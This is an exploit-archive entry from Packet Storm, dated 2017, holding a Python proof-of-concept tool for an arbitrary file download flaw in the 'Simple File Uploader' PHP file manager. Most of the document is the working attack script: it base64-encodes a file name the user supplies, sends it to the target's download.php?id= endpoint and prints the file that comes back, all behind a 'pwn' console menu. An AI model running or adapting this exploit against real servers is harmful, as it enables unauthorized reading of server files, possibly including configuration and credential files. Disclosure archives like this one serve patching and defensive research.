Simple File Uploader Arbitrary File Download

2017-04-27T00:00:00
ID PACKETSTORM:142338
Type packetstorm
Reporter Daniel Godoy
Modified 2017-04-27T00:00:00

Description

                                        
                                            `# Exploit Title: Simple File Uploader - Arbitrary File Download   
# Date: 27/04/2017  
# Exploit Author: Daniel Godoy  
# Vendor Homepage: https://codecanyon.net/  
# Software Link: https://codecanyon.net/item/simple-file-uploader-explorer-and-manager-php-based-secured-file-manager/18393053  
# Tested on: GNU/Linux  
# GREETZ: Rodrigo MouriA+-o, Rodrigo Avila, #RemoteExecution Team  
  
  
  
  
POC  
  
#!/usr/bin/env python  
#https://pastebin.com/HeT7RuRU  
import os,re,requests,time,base64  
os.system('clear')   
  
BLUE = '\033[94m'  
RED = '\033[91m'  
GREEN = '\033[32m'  
CYAN = "\033[96m"  
WHITE = "\033[97m"  
YELLOW = "\033[93m"  
MAGENTA = "\033[95m"  
GREY = "\033[90m"  
DEFAULT = "\033[0m"  
  
def banner():  
print WHITE+""  
print " ## ## "  
print " ## ## "   
print " ############## "  
print " #### ###### #### "  
print " ###################### "  
print " ## ############## ## "  
print " ## ## ## ## "  
print " #### ####"  
print ""  
  
def details():  
print WHITE+" =[" + YELLOW + "Simple File Uploader Download Tool v1.0.0 "  
print ""  
  
def core_commands():  
os.system('clear')  
print WHITE+'''Core Commands\n===============\n  
Command\t\t\tDescription\n-------\t\t\t-----------\n  
?\t\t\tHelp menu  
quit\t\t\tExit the console  
info\t\t\tDisplay information  
download\t\t\tExploit Vulnerability  
  
'''  
  
def about():  
os.system('clear')  
print WHITE+'''Simple File Uploader Download Tool v1.0.0 \n===============\n  
Author\t\t\tDescription\n-------\t\t\t-----------\n  
Daniel Godoy\t\thttps://www.exploit-db.com/author/?a=3146  
'''  
  
def download():  
other = 'a'  
while other != 'n':  
urltarget = str(raw_input(WHITE+'Target: '))  
filename = str(raw_input(WHITE+'FileName: '))  
filename = base64.b64encode(filename)  
print RED+"[x]Sending Attack: "+WHITE+urltarget+'download.php?id='+filename  
final = urltarget+'download.php?id='+filename  
r = requests.get(final)  
print r.text  
other = str(raw_input(WHITE+'Test other file? y/n: '))  
if other == "n":  
print "Type quit to exit. Bye!"  
  
  
  
banner()  
details()  
  
option='0'  
while option != 0:  
option = (raw_input(RED+"pwn" + WHITE +" > "))  
if option == "quit":  
os.system('clear')  
option = 0  
elif option == "?":  
core_commands()  
elif option == "help":  
core_commands()  
elif option == "about":  
about()  
elif option == "download":  
download()  
elif option == "info":  
about()  
else:  
print "Not a valid option! Need help? Press ? to display core commands " +GREEN  
  
`